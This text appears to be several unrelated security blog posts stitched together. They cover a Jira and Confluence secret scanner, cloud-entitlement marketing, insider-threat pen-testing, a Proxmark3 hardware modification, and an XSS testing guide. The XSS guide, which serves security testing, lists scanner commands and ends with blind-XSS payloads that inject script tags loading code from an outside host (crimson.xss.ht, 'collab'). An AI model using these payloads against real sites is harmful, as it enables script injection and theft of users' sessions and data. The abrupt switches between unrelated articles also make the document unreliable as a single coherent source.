TL;DR: Upgrade Confluence to a patched version and employ the open-source security scanner n0s1 to proactively address potential secret leaks.

Why do I need a secret scanner?

It is a widely recognized best practice for Product Security Engineers to conduct scans of the software codebase in search of potential inadvertent secret leaks. Developers may find themselves working on a new feature that requires integration with AWS and might, initially for convenience during testing, hardcode the AWS access key. This practice is acceptable for local testing, with the intention of removing the secret prior to pushing the final code to Source Code Management (e.g., GitHub, GitLab, etc.).
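To make the scenario concrete, here is a minimal sketch of that anti-pattern in Python (the key values below are the placeholder examples from the AWS documentation, not real credentials):

import boto3

# The anti-pattern: credentials hardcoded "just for local testing"
s3 = boto3.client(
    "s3",
    aws_access_key_id="AKIAIOSFODNN7EXAMPLE",  # AWS docs placeholder
    aws_secret_access_key="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",  # placeholder
)

# The safer habit: let the SDK resolve credentials from the environment,
# a credentials file, or an instance profile instead
s3 = boto3.client("s3")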

However, it is not unusual for individuals to forget to remove the sensitive data before committing changes, resulting in sensitive data being inadvertently exposed within the source code. Consequently, anyone with read access to the repository gains access to the AWS resources associated with the exposed AWS access key in our example.

That is a very common mistake, and well-established Product Security Programs often implement controls such as pre-commit hooks or secret scanning tools (e.g., GitHub Secret Scanning, GitLab Secret Detection) to mitigate the risk of secret leaks.
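As an illustration, a pre-commit hook can be as small as the following sketch (a homemade example saved as .git/hooks/pre-commit and made executable; dedicated tools are far more robust in practice):

#!/usr/bin/env python3
# Minimal pre-commit hook sketch: abort the commit if a staged line adds
# something that looks like an AWS access key ID
import re
import subprocess
import sys

AWS_KEY = re.compile(r"\b(AKIA|ASIA)[A-Z0-9]{16}\b")

diff = subprocess.run(
    ["git", "diff", "--cached", "-U0"],
    capture_output=True, text=True,
).stdout

leaks = [line for line in diff.splitlines()
         if line.startswith("+") and AWS_KEY.search(line)]

if leaks:
    print("Potential AWS access key in staged changes:")
    print("\n".join(leaks))
    sys.exit(1)  # non-zero exit status aborts the commit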

In this article, I aim to address a frequently overlooked but similar use case: the inadvertent exposure of secrets within Project Management platforms like Jira, Confluence, and Linear.app.

Confluence page exposing AWS access key

Development teams commonly employ tools like Jira and Linear.app for ticketing and rely on knowledge base platforms such as Confluence to facilitate their software development life cycle (SDLC) processes. Even before a developer writes their initial code, including, for instance, an API call to AWS, it’s quite likely that there is already a Jira ticket assigned to that developer, specifying which AWS account to utilize. On top of that, there might be a software documentation page on Confluence outlining the software’s cloud integration. Unfortunately, at times, individuals may inadvertently post sensitive data (such as AWS credentials) on a platform that isn’t suitable for securely storing secrets, like Jira or Confluence.

Why should I scan Jira/Confluence for secrets?

Some people may contend that the consequences of a secret leak within a platform like Confluence are not as significant as a leak within the source code. After all, source code is intended for building and public distribution, while Confluence and Jira implement access controls to restrict access to authorized personnel. I firmly disagree with this perspective, and to illustrate my point, we can examine the disclosure of CVE-2023-22515.

CVE-2023-22515 Confluence unauthorized administrator access

In the event of full exploitation, the CVE-2023-22515 vulnerability could potentially grant external attackers unauthorized administrative access to Confluence Data Center or Confluence Server. Both the vendor (Atlassian) and the US government have issued warnings regarding active exploitation of this vulnerability by nation-state actors. Companies that previously relied on the assumption that Confluence data would only be accessible to authorized users are now confronted with a situation in which they must worry not only about attackers attempting to use Confluence as a pivot into their internal infrastructure, but also about attackers gaining access to all of their confidential content within Confluence. If attackers can locate secrets within Confluence, as exemplified by our AWS key scenario, their pivoting goal becomes incredibly easy to accomplish.

That’s why it’s considered a sound security practice to exclusively permit the sharing of secrets through approved secret management software (e.g., Vault, 1Password, etc.), and additionally, to employ a secret scanner to proactively monitor the exposure of secrets on unapproved platforms.

What is a secret scanner?

Secret scanning involves inspecting code repositories and other data sources to uncover sensitive information, including passwords, access keys, and personally identifiable information (PII). This procedure can be carried out using a range of tools and methods, such as the use of regular expressions to identify patterns associated with specific types of sensitive data.
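As a rough illustration of the regex approach, a toy scanner can be just a dictionary of patterns applied to each page or ticket body (the patterns below are simplified examples, not any tool's actual rule set):

import re

PATTERNS = {
    # AWS access key IDs have a well-known shape: AKIA/ASIA plus 16 characters
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[A-Z0-9]{16}\b"),
    "plaintext_password": re.compile(r"(?i)password\s*[=:]\s*\S+"),
}

def scan(text):
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            yield name, match.group(0)

page = "Use AKIAIOSFODNN7EXAMPLE for staging; password = hunter2"
for finding in scan(page):
    print(finding)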

What is n0s1 secret scanner?

n0s1 is an open-source secret scanner designed by Spark 1 Security for use with Jira, Confluence, and Linear.app. It can be executed as a command-line interface (CLI), within a Docker container, as part of GitHub Actions, or integrated into GitLab CI. n0s1 employs predefined and customizable regular expressions to identify a wide range of secret classes that you wish to monitor. Its versatility enables it to address various use cases, which we will explore in the following sections.

n0s1 install

Simply install it via pip and use “-h” to get help. More details at the n0s1 documentation page:

python -m ensurepip --upgrade
python -m pip install n0s1
n0s1 confluence_scan -h

Scan Jira from CLI:

Once installed, scan your Jira server:

n0s1 jira_scan --server "https://<YOUR_JIRA_SERVER>.atlassian.net" --api-key "<YOUR_JIRA_API_TOKEN>"

Scan Jira and Confluence from GitLab CI:

The advantage of integrating with GitHub and GitLab is the ability to centralize all the findings within a unified platform. If you are already scanning for secrets in your codebase and keeping track of these findings in the GitHub Security tab or the GitLab Vulnerability Report, it makes sense to also have the results from the secret scanner sent to the same location. This streamlines the management of security information and enhances overall visibility.

n0s1 findings as part of GitLab Vulnerability report

To create a GitLab Vulnerability Report akin to the one displayed in the screenshot, incorporate the following configuration into your .gitlab-ci.yml file.

jira-scan:
  stage: test
  image:
    name: spark1security/n0s1
    entrypoint: [""]
  script:
    - n0s1 jira_scan --email "<EMAIL>" --api-key $JIRA_TOKEN --server "https://<YOUR_DOMAIN>.atlassian.net" --report-file gl-dast-report.json --report-format gitlab
    - apt-get update
    - apt-get -y install jq
    - cat gl-dast-report.json | jq
  artifacts:
    reports:
      dast:
        - gl-dast-report.json

confluence-scan:
  stage: test
  image:
    name: spark1security/n0s1
    entrypoint: [""]
  script:
    - n0s1 confluence_scan --email "<EMAIL>" --api-key $JIRA_TOKEN --server "https://<YOUR_DOMAIN>.atlassian.net" --report-file gl-dast-report.json --report-format gitlab
    - apt-get update
    - apt-get -y install jq
    - cat gl-dast-report.json | jq
  artifacts:
    reports:
      dast:
        - gl-dast-report.json

*Note: you will also need to add a protected JIRA_TOKEN CI/CD variable in your GitLab repository's CI/CD settings.

Scan Jira using GitHub Actions:

Additionally, you have the option to use GitHub Actions for running a secret scan and exporting the results into a SARIF report. If you’re utilizing GitHub Enterprise, your report will also be accessible through the Security scanning tab, providing a comprehensive view of your security assessment.

name: jira_secret_scanning
on:
  schedule:
    - cron: "0 10 * * *"
  workflow_dispatch:

jobs:
  jira_secret_scanning:
    name: Jira Scanning for Secret Leaks
    runs-on: ubuntu-20.04
    steps:
      - name: Run n0s1 secret scanner on Jira
        uses: spark1security/n0s1-action@main
        env:
          JIRA_TOKEN: ${{ secrets.JIRA_API_TOKEN }}
        with:
          scan-target: 'jira_scan'
          user-email: 'service_account@<YOUR_COMPANY>.atlassian.net'
          platform-url: 'https://<YOUR_COMPANY>.atlassian.net'
          report-file: 'jira_leaked_secrets.sarif'
          report-format: 'sarif'
      - name: Upload n0s1 secret scan results to GitHub Security Code scanning
        uses: github/codeql-action/upload-sarif@v2
        with:
          sarif_file: jira_leaked_secrets.sarif
      - name: Upload n0s1 secret scan report
        uses: actions/upload-artifact@v3
        with:
          name: n0s1-artifact
          path: jira_leaked_secrets.sarif
          retention-days: 5

Scan Confluence using customized regular expressions:

You can further customize the regex configuration to target specific sensitive data that aligns with your requirements. For instance, if you wish to identify any occurrences of the string “password = “ or “password:”, you can achieve this by creating a local copy of the regex.toml file and appending the following regular expression to it:

[[rules]]
id = "plaintext_password"
description = "Plaintext Password"
regex = '''(?i)password ?[=:] ?.*'''
keywords = ["password"]
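Before deploying the new rule, it is worth sanity-checking the expression against a few sample strings (plain Python re here, just to validate the pattern itself, independently of n0s1):

import re

rule = re.compile(r"(?i)password ?[=:] ?.*")

for sample in ["password = hunter2", "PASSWORD: s3cret", "passphrase hint"]:
    print(sample, "->", bool(rule.search(sample)))
# password = hunter2 -> True
# PASSWORD: s3cret -> True
# passphrase hint -> False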

You can save your new regex configuration to a local file (e.g. /home/user/my_regex.toml) and use it with the argument “--regex-file”:

n0s1 confluence_scan --regex-file /home/user/my_regex.toml --email <YOUR_EMAIL> --api-key <YOUR_CONFLUENCE_API_TOKEN> --server https://<YOUR_CONFLUENCE>.atlassian.net

If you are using Docker, you will need to mount a volume to pass the local file to the container:

docker run -v /home/user/my_regex.toml:/my_regex.toml spark1security/n0s1 confluence_scan --email <YOUR_EMAIL> --api-key <YOUR_CONFLUENCE_API_TOKEN> --server https://<YOUR_CONFLUENCE>.atlassian.net --regex-file /my_regex.toml

Scan Confluence and automatically warn users about secret leaks:

A particularly valuable feature, especially for organizations with extensive Jira/Confluence usage, is the ability to leave a comment on the specific ticket or page where the leak has been discovered. The posted message serves as a warning to the user regarding the potential secret exposure and offers guidance on how to remediate it effectively.

n0s1 confluence_scan --post-comment --server "https://<YOUR_SERVER>.atlassian.net" --api-key "<YOUR_API_TOKEN>"

This approach resonates with the concept that security is a collective responsibility within an organization, while also simplifying the scalability of secret monitoring. Although the security team will maintain a centralized report with all the findings, it also empowers the ticket owner to become informed about the issue and take steps to address the secret exposure on their own.

n0s1 scanner auto message posted to the page where a leak was found

There are various other applications for n0s1. In this article, my primary emphasis was on the blue team’s perspective regarding the secret scanner. Nevertheless, pentesters can also make effective use of it to illustrate scenarios, such as demonstrating the potential impact of CVE-2023-22515 exploitation, even when administrative access is not attainable. The capacity to discover valuable sensitive information might be all that the red team requires to execute privilege escalation and/or pivot within the system.

As n0s1 is an open-source project, you’re welcome to either fork the project or contribute to the original repository. A collaborative endeavor involving the open-source community could significantly enhance the scanner’s capabilities, extending its support to cover additional platforms beyond the current ones (Jira, Confluence, Linear.app). This collective effort can also result in the development of a comprehensive set of regular expressions that effectively identify a broad range of secrets that require protection worldwide.

Did you find this article intriguing? Please feel free to share your comments and feedback regarding the post. If you want to learn more about the n0s1 security scanner or any other insightful content by Spark 1 Security, please visit spark1.us

Originally published at: https://medium.com/@marcelosacchetin/secret-scanner-for-jira-and-confluence-cve-2023-22515-defense-in-depth-ce30f10a7661

Nowadays, with the evolution of technology, many companies start their journey as cloud-native organizations and never operate traditional infrastructure environments. Cloud computing has become accessible to almost everyone inside a company, from the cloud architects to the marketing team. And since the COVID-19 pandemic normalized remote work, many organizations have been expanding their cloud access even further.

This migration, or “adaptation”, brings a series of challenges. According to the Gartner Peer Community, these are the responses to a question about cloud adoption:

 

“What, according to you, is the most common challenge faced with cloud adoption?”

Source: https://www.gartner.com/peer-community/poll/according-to-most-common-challenge-faced-cloud-adoption

As we can see, almost 30% didn't have enough personnel with cloud expertise, almost 30% faced sheer data sprawl in their existing environment, 18% had no visibility into the content, and 13% were challenged by migrating data to the cloud. In other words, almost 80% of the challenges involved either data management or a shortage of people with cloud expertise. All of this information brings us to another important challenge.

A cloud strategy is a concise viewpoint on the role of cloud computing in the organization. However, business and IT leaders continue to make 10 common mistakes when crafting their cloud strategy, according to Gartner, Inc.

Gartner analysts discussed how to enable and exploit cloud, and how to demonstrate value, at the Gartner IT Infrastructure, Operations & Cloud Strategies Conference 2022. Business and IT leaders should collaboratively build a cloud strategy and avoid the following 10 mistakes. Let's talk about all of them.

 

  1. Assuming It’s an IT (Only) Strategy

Cloud computing isn’t only about technology. Those outside IT have skills and knowledge critical to cloud strategy success. “Business and IT leaders should avoid the mistake of devising an IT-centric strategy and then trying to ‘sell it’ to the rest of the business,” said Meinardi. “Business and IT should be equal partners in the definition of the cloud strategy.”

  2. Not Having an Exit Strategy

Devising an exit strategy from cloud providers is difficult, which is one of the reasons why many leaders don’t create one. Many organizations believe they don’t need an exit strategy because they don’t expect to bring anything back from the cloud. However, an exit strategy is vital to the success of an organization’s cloud strategy. “It’s like having an insurance policy in your drawer, that you hopefully will never need to use,” said Meinardi.

  3. Combining or Confusing a Cloud Strategy with a Cloud Implementation Plan

A cloud strategy is different from a cloud implementation plan and a cloud strategy must come first. It is the decision phase in which business and IT leaders decide the role that cloud computing will play in the organization. A cloud implementation plan comes next, putting the cloud strategy into effect.

  4. Believing It’s Too Late to Devise a Cloud Strategy

It is never too late to begin a cloud strategy. “If organizations drive cloud adoption without a strategy this will ultimately cause resistance from individuals who are not aligned on the strategy’s key drivers and principles,” said Meinardi. “As a result, this resistance will slow down cloud adoption and potentially jeopardize the entire cloud project.”

  5. Equating a Cloud Strategy with “We’re Moving Everything to the Cloud”

Many organizations assume that having a cloud strategy implies moving everything to the cloud. “This approach deters many business and IT leaders from devising a strategy because they think it means they’ll be forced to start using cloud computing for everything,” said Meinardi. “Organizations should keep an open mind and partner with a non-cloud technology expert, such as an enterprise architect, who can bring a broad viewpoint in the definition of your cloud strategy.”

  6. Saying “Our Cloud Strategy Is Our Data Center Strategy”

Many organizations confuse their cloud strategy with their data center strategy. While organizations need to keep them separate, they need to ensure they align with each other because that affects the role that cloud computing will play in their organization. “Cloud strategy decisions are workload by workload, not data center decisions,” said Meinardi.

  7. Believing That an Executive Mandate Is a Strategy

Another common mistake that organizations make is to adopt cloud computing because the CEO, CIO or the head of a business unit believes that doing so will result in cost savings. Gartner analysts recommend treating executive mandates as sponsorship to devise a cloud strategy and not as a cloud strategy in and of itself. The cloud strategy should also keep the connection to the business, ensuring that organizations know why workloads are moving and what the goal is.

  8. Believing That Being a <Fill in Vendor> Shop Means That Is the Cloud Strategy

Organizations will likely use several different cloud services over time. As the use of cloud services could become increasingly broad and diverse, business and IT leaders should devise a broad strategy by accommodating multiple types of scenarios, cloud services, vendors and non-cloud environments.

  9. Outsourcing Development of Your Cloud Strategy

Outsourcing an organization’s cloud strategy may sound attractive, but should not be done – it is far too important to outsource. Instead, Gartner analysts recommend that business and IT leaders use third parties — even the cloud provider — for implementation. This can be a cost-effective way of procuring the scarce cloud skills their organization needs.

  10. Saying “Our Strategy Is Cloud First” Is the Entire Cloud Strategy

A cloud-first approach means that if someone asks for an investment, the default place for them to build or place the new asset is in the public cloud. “But cloud-first doesn’t mean cloud only. If business and IT leaders adopt a cloud-first principle, their strategy should work out the exceptions to the default choice that will make applications and data reside elsewhere than in the cloud,” said Meinardi.

 

The big issue is that the larger the company, the more people will have access to cloud-based environments. Moreover, many permissions are granted to applications and machines that connect to other applications and databases to exchange information.

Thus, it is necessary to have a strategy that limits unnecessary access and prevents inadequate sharing of information, which can be achieved through CIEM.

 

What is CIEM?

The purpose of Cloud Infrastructure Entitlements Management (CIEM) is to manage access in cloud and multi-cloud environments.

This is possible through the principle of least privilege, which helps companies avoid risks such as attacks by malicious users and data breaches, problems often generated by excessive permissions in this type of infrastructure.

Thus, a CIEM solution allows you to remove these excessive entitlements and centralize the visibility and control of permissions in a cloud environment.
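Conceptually, the core of this analysis is a diff between what an identity is granted and what it actually uses. A toy Python illustration of the idea (all entitlement names hypothetical):

# Entitlements granted to an identity vs. those observed in use
granted = {"s3:GetObject", "s3:PutObject", "iam:CreateUser", "ec2:TerminateInstances"}
used_last_90_days = {"s3:GetObject", "s3:PutObject"}

# The excess is what a CIEM solution would flag for review or removal
excessive = granted - used_last_90_days
print("Entitlements to review:", sorted(excessive))
# Entitlements to review: ['ec2:TerminateInstances', 'iam:CreateUser']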

Through the use of artificial intelligence, a CIEM solution is also able to analyze exposure levels of a company’s cloud environments, enabling the identification and reduction of cybersecurity risks.

 

How can we help you?

Has your company migrated its infrastructure to the cloud? Do you work in a multi-cloud environment? Does your security team have full visibility of identities and entitlements on Cloud Service Providers (CSPs)?

Managing cloud entitlements has become a challenge for cybersecurity teams. This happens especially because of the increased number and complexity of multi-cloud environments. In these environments, services and policies can be misconfigured and poorly defined.

According to Gartner, by 2024, organizations running cloud infrastructure services will suffer a minimum of 2,300 violations of least privilege policies, per account, every year.

senhasegura Cloud Entitlements helps enterprises manage cloud access risks via administration-time controls for the governance of entitlements in hybrid and multi-cloud IaaS.

 

Do you know what "Build With Us" is?

We are inviting you to have first-hand access to our new cloud security platform and participate in our beta users program. If you are an Information Security professional with experience in IAM and wish to participate in the construction of an innovative project, come build with us.

What do I gain as a senhasegura beta user?

  • Free access to senhasegura Cloud Security - Cloud Entitlements for one year, with no limit on the number of identities to manage.
  • Opportunity to participate in online feedback sessions with our team of Build-With-Us supporters to share your impressions and suggestions.
  • Rich exchange of experiences with professionals in the IAM market about the challenges of managing identities in multi-cloud environments.
  • Opportunity to permanently occupy a chair in our Innovation Committee, where we discuss problems and build solutions for the most diverse challenges in the security area - limited spaces!


What will be your mission as a senhasegura beta user?

  • Co-creation: Giving feedback and proposing improvements that would make your day-to-day work easier.
  • Confidence: Report bugs and problems experienced while using the product, helping the solution gain maturity and quality.
  • Practice: Carrying out specific tasks and procedures within the product to support us in building a specialist market solution.
  • Innovation: Get first-hand pre-release updates to try before the stable release goes live.

Source: demo console.

If you would like to be part of that, come to us and build with us.

 


We're extremely happy to invite you to the first-ever webinar by PenTest Mag! Hosted by Timothy Hoffman, the talk will revolve around the topic of our latest online course - "Aerospace Cybersecurity: Satellite Hacking", designed and instructed by Angelina Tsuboi.

During the event, the discussion will touch on the practical aspects of the fascinating field of aerospace cybersecurity. You will have a chance to hear about tools, techniques, and even real-life case studies from the realm of satellite ethical hacking. After the talk, there will be a chance to ask our instructor some questions. Also, those participants who have not yet decided to enroll will get a chance to seize a special deal to secure their seats.

 

REGISTER NOW >>

Anastasios Arampatzis

Risks assessed during a penetration test (pen-test) generally focus on attacks outside the information system. Indeed, a classic approach consists of testing the threats of external attacks, followed by assessing the risks originating from the supply chain, customers, partners, and suppliers. Risks of insider attacks, particularly from an employee’s unlawful or erroneous access to data, are often considered less important. 

Never underestimate the impact of insider risks

However, as the latest Verizon 2023 Data Breach Investigations Report indicates, almost 17% of data breaches are attributed to insiders, either negligent or intentional. The same report shows that the most significant threat does not come from "ordinary" employees but rather from privileged and technical staff like developers and system administrators. Because of the nature of systems and data these people have access to, a single mistake might have a disturbing effect on the organization. And according to the 2023 Insider Threat Report by Cybersecurity Insiders, 74% of organizations have a moderate to high risk of insider threats.

It is, therefore, crucial for any organization with a solid security plan to assess and prevent insider threats. Penetration testing can become a valuable tool for detecting and preventing the consequences of an internal attack.

A primer on insider threats

Insider threats from internal staff or people closely associated with a company pose a significant organizational risk. These individuals can include current and former employees, customers, service providers, contractors, or partners with direct or indirect access to the organization's resources. Unfortunately, they can use this access intentionally or unintentionally to compromise the IT and network infrastructure or internal applications.

It's worth noting that not all insider threats stem from malicious motives or intentional actions. Many security incidents occur due to human negligence, errors, or insufficient security measures. For instance, clicking on a phishing email, using unpatched workstations, having weak passwords, or losing business equipment are potential risk factors that can compromise an organization's resources.

Although no company is immune to potential insider threats, businesses with a high turnover rate or failing to raise awareness of cybersecurity issues among their employees are at greater risk. Therefore, it is essential to identify insider risks, implement adequate controls and simulate an internal attack through penetration testing to measure the actual impact and test the effectiveness of the protections in place.

How pen-testing can help

By being granted the same access as a company employee, pen-testers can simulate an insider attacker and attempt to access resources that should not be accessible to them.

Application hardening

When conducting a web application pen-test, testers will be granted typical access rights for solutions meant to be used internally. For public-facing B2B or B2C platforms, they will have access to the back office. 

If the solution is for internal use, the goal is to identify flaws that an authenticated user could exploit. This includes verifying proper segmentation of duties and access rights, testing for possible improper behavior, and technical vulnerabilities that malicious actors could exploit. 

On the other hand, for externally facing platforms, it's crucial to test the separation of duties, primarily if multiple access privileges exist. Accessing the back office helps to test for the possibility of internal actors moving laterally and accessing other corporate systems. Pen-testing can also evaluate the risks of an attacker taking control of the back office through a technical flaw or stolen credentials.

Corporate network protection

It is a common practice that a corporation's internal network pen-test includes an assessment of insider threats. Pen-testing usually tests the possibilities of accessing the Wi-Fi internal network without user credentials. In this case, Wi-Fi vulnerabilities or brute force attacks may allow an external attacker to access the corporate network.

Generally, for tests on the internal corporate networks, the pen-testers have the same level of access as employees with minimum privileges on the company’s information system. This makes it possible to test the segmentation of access rights and the possibilities of accessing critical resources or taking control of servers. In addition, pen-testing discovers vulnerabilities that could be exploited by a malicious employee or an external attacker who has gained access to the network to move laterally undetected.

Pen-testing can also help thwart the problem of privilege abuse, which is a common attack vector. Providing different access privileges - from standard employees to developers and system admins - enables pen-testers to perform a more detailed and complete analysis of insider risks. This is even more relevant and important if the company has implemented network segmentation to protect critical systems from accessing the internet directly.

Phishing and social engineering safeguards

In a social engineering pen-test, the team is granted access to the same information as the company's employees. The company's testing objectives determine the amount of information supplied to the pen-testers. 

It is vital for businesses to be cautious not to disclose too much information, as a complete data set can distort the tests. Phishing attacks are typically based on partial or imperfect knowledge of the company, so it is advisable only to provide information that employees have access to, like company activity, internal tools, organization charts, and contact details. This approach will enable pen-testers to craft and execute realistic attack scenarios.

To identify risks from social engineering attacks, pen-tests may involve tactics such as:

  • Exploiting internal company news to trick employees into opening a malicious email attachment
  • Stealing identities by leveraging the knowledge of the relationships between different departments and personnel within the organization
  • Cloning internal tools and using them to steal credentials

Frequent pen-testing can help businesses identify potential vulnerabilities and eliminate insider security threats. After these tests have been performed, companies can mitigate any loopholes using software solutions and investing in raising security awareness among their employees.

About the Author: Anastasios Arampatzis is a retired Hellenic Air Force officer with over 20 years’ worth of experience in managing IT projects and evaluating cybersecurity. During his service in the Armed Forces, he was assigned to various key positions in national, NATO and EU headquarters and has been honoured by numerous high-ranking officers for his expertise and professionalism. He was nominated as a certified NATO evaluator for information security.

Anastasios’ interests include among others cybersecurity policy and governance, ICS and IoT security, encryption, and certificates management. He is also exploring the human side of cybersecurity - the psychology of security, public education, organizational training programs, and the effect of biases (cultural, heuristic and cognitive) in applying cybersecurity policies and integrating technology into learning. He is intrigued by new challenges, open-minded and flexible. Currently, he works as a cybersecurity content writer for Bora Design. Tassos is a member of the non-profit organization Homo Digitalis.


When I first borrowed the Proxmark3.0 X from @unrooted, the tinkerer part of me decided to do something with it, as the amount of both free time and spare parts around me was tremendous. This short entry will highlight some hardware modifications applied to this marvelous device.

Initial preparations

The product of finest craftsmanship by MToolsTec originates from a small batch of devices with 512 MB flash + a reliable SPIFFS filesystem, which can easily fit even the most extensive dictionaries of keys, LF tag IDs and UIDs.
First, I decided to place a cooler and an HST socket for an external Li-Po on the top of the main board.
Exporting the JTAG right now is a necessity too, because later its soldering pads will be covered by other components.
This model of Proxmark3 consists of six elements:

    I)   The main board
    II)  BT add-on
    III) LF antenna
    IV)  Li-Po cell
    V)   Flat inter-connector tape
    VI)  Screws and poles

Frankly, I didn't want to dismantle the poles and screws whenever adding new stuff; that's why I rotated (I) and (II) so that all vital internals of (I) face the outside of the device, while also leaving quite some free space in between. I have also bent (V) to the outside and secured it with duct tape, allowing for those new arrangements.
I noticed that during flashing via JTAG, the area around the FPGA was often hot. To overcome this, the cooler was mounted above it.

LF Antenna

This was probably the most practical addition so far - without the antenna on top, the device became a bit thinner, and carrying a screwdriver to attach/detach it was no longer a necessity. I used 1.2 mm single-core wire to ensure stable data transmission. Two crocodile clip cables allow connecting the antenna to the middle pair of the poles without any hassle.

The front

In order to access the D+ and D- pads of the connected micro-USB cable, I have changed the position of the Li-Po cell on the BT add-on.
Fortunately, the manufacturer made sure that the cell's wires are long enough to allow this. Same as with the main Proxmark board, the JTAG and serial lines were mounted on the top with female sockets. A small feather, glued below the Li-Po, actively protects the device from influence of various unholy forces.

The rear

On the bottom-facing part of the device, the cooler is operated by a Wemos D1 Mini Pro, powered by a rechargeable 3.7V Li-Po (single cell) and a micro-USB charger. A temperature + humidity sensor launches the cooling routine once a specific threshold is met. By simply removing the pink control jumper, the cooler can enter a state in which it permanently cools the FPGA side. Whenever the device is moved, a tilt sensor communicates this fact to the Wemos, which in turn sends the motion force value using a plain HTTP webhook.
The sensors, as well as the secondary HST socket and some of the cables, are enclosed by the SRBOT 2.4 GHz Wi-Fi jammer - it tightens all of the elements together.

The mighty Peltier

Initially, the cooler was powered by an external power source; only later did I attach it to the Wemos for more granular control. The power (~3.7V) to this specific cell is delivered in bursts, with a polarity change happening between each of them (ground becomes Vcc for a while, and the other way round). This way, both the FPGA-facing and board-facing surfaces of the cooler act interchangeably - one cools while the other heats, and vice versa - so none of them remains hot for too long, and heat is well distributed.
It is important to keep the cooler away from the power sources and to introduce some space above one of the planes to prevent overheating. As suggested by mighty redditors, a radiator is a necessity here for optimal operation. I plan on adding it and a 555 timer unit to allow manual setting of how many seconds pass between each polarity change.
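For the curious, the burst-and-reverse control loop boils down to something like the following MicroPython sketch (a rough reconstruction; the DHT22 sensor, pin numbers, threshold, and burst length are my assumptions, not the exact wiring):

import time
import dht
from machine import Pin

sensor = dht.DHT22(Pin(4))   # assumed: temp/humidity sensor on GPIO4
in1 = Pin(12, Pin.OUT)       # assumed: H-bridge inputs driving the Peltier
in2 = Pin(13, Pin.OUT)

THRESHOLD_C = 40             # assumed trigger temperature

def burst(seconds=5):
    # one cooling burst, then reversed polarity, so neither plate stays hot
    in1.on(); in2.off()
    time.sleep(seconds)
    in1.off(); in2.on()
    time.sleep(seconds)
    in1.off(); in2.off()

while True:
    sensor.measure()
    if sensor.temperature() >= THRESHOLD_C:
        burst()
    time.sleep(2)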

Update: a few days later

I somehow managed to burn the Wemos while fixing the SMA socket - after removing almost everything from the rear of the device, I replaced the Li-Po charger with a more potent one (USB Type-C with two indicator LEDs) and changed the position of the temperature sensor. The Vcc and GND of the charger, tightened with a slim piece of duct tape, serve as an auxiliary power source whenever USB-C is connected, and fit nicely into the Peltier's socket. Two OUT[+|-] cables (red and yellow), attached freely to the top of the cooler, currently await the arrival of the FPGA 2040 and some extra parts to replace the broken Wemos. Stay tuned.
Epilogue

This was certainly a fun project that gave me some insight into the inner workings of Proxmark3 and helped me further develop my crafts. Thanks for reading, and see you.
 

INTRODUCTION

The article describes how to test the application to find Cross-Site Scripting vulnerabilities. The advice in this article is based on the following:

  • OWASP Web Security Testing Guide
  • OWASP Application Security Verification Standard
  • Bug bounty reports
  • Own experience.

TOOLING

Tools with basic usage instructions & wordlists used for XSS detection.

STANDALONE TOOLS

  • XSStrike — semi-automated, capable of testing blind XSS, injecting in the URL path, finding outdated JS components, and bypassing WAF.

The options --path, --blind, and --fuzzer will not work all at once.
The --path option will not work if the URL contains a query string (http://URL/contains/any?queries=1).

# SINGLE URL + ADDITIONAL HEADERS (Authorization)
python xsstrike.py -u "http://afine.com/s.php?q=test" --headers "Auth_header: secret1\nCookie: auth2=secret2"
## YOU CAN ALSO EDIT XSStrike CONFIG FILE => XSStrike/core/config.py
headers = {
    'Auth_header': 'secret1',
    'Cookie': 'auth2=secret2',
}

# POST REQUEST
python xsstrike.py -u "http://afine.com/s.php" --data "q=test"

# POST + JSON
python xsstrike.py -u "http://afine.com/s.php" --data '{"q":"query"}' --json

# MULTIPLE URLS & VULNS LOG TO FILE xss.log
for url in $(cat urls_path_only.txt); do python xsstrike.py -u "$url" --log-file xss.log --file-log-level VULN | tee -a xsstrike_all.log; done

# INJECT IN PATH
python xsstrike.py --path "http://afine.com/one/two/three/"

# FIND WAF BYPASS (Fuzzing)
python xsstrike.py -d 1 --fuzzer -u "http://afine.com/s.php?q=test"

# BLIND PAYLOAD
## EDIT XSStrike CONFIG FILE => XSStrike/core/config.py
blindPayload = '"><script src=https://collab></script>'
## USE FLAG
python xsstrike.py -u "http://afine.com/s.php?q=test" --blind

# PROXY TO BURP
## EDIT XSStrike CONFIG FILE => XSStrike/core/config.py
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# USE FLAG
python xsstrike.py -u "http://afine.com/s.php?q=test" --proxy

For more information check XSStrike wiki.

  • DalFox — semi-automated, capable of testing stored/blind XSS and finding bypasses for misconfigured CSP.
# SINGLE URL + AUTHORIZATION
dalfox url https://afine.com/ -H "Cookie: auth1=secret1" -H "Auth2: secret2"

# MULTIPLE URLS & LOG TO FILE dalfox.txt
cat urls.txt | dalfox pipe --mass --silence --no-color -o dalfox.txt

# BLIND
dalfox url https://afine.com/ -b https://collab

# PROXY TO BURP
dalfox url https://afine.com/ --proxy http://127.0.0.1:8080

# SCAN USING BURP REQUEST IN A TXT FILE
dalfox file --rawdata request.txt

# STORED XSS MODE + POST DATA & GET TRIGGER
## dalfox sxss TARGET_URL -d POST=DATA --trigger VERIFY_URL --skip-mining-all --skip-bav
dalfox sxss "https://afine.com/name" -X POST -d "user=karmaz&pass=123" -p user,pass --trigger "https://afine.com/my_profile"

# THOROUGH TESTING WITH HEADLESS MODE (SLOW)
dalfox file urls.txt --deep-domxss --follow-redirects -b https://collab

For more information check DalFox wiki.

I have described how to use the automatic scanners above in another article.

 

BURP SUITE PRO EXTENSIONS

  • Paramalyzer — shows which parameters are reflected in the response, analyzing only in-scope targets.
Source: Own study — Example output from the Paramalyzer analysis.
  • DOM Invader — manual testing of DOM and PostMessage XSS, possible upgrade to semi-automated using the Auto fire events option.
Source: Own study — DOM Invader configuration for semi-automated testing of DOM XSS & PostMessage.

Prototype pollution will be described in another article in this series.

  • xssValidator — Intruder payload generator extension that detects successful payload execution using PhantomJS.

# QUICK SETUP ON macOS
cd $HOME/tools/
git clone https://github.com/PortSwigger/xss-validator.git
brew install phantomjs
phantomjs $HOME/tools/xss-validator/xss-detector/xss.js &
Source: Own study — Basic setup for xssValidator + Intruder in Burp Suite Pro.
  • Burp Bounty Pro — additional automatic scanning capabilities for Burp.
Source: Own study — Using Burp Bounty Pro on 4 URLs with an XSS scan.

WORDLISTS

<script src=https://crimson.xss.ht></script>
'><script src=https://crimson.xss.ht></script>
"><script src=https://crimson.xss.ht></script>
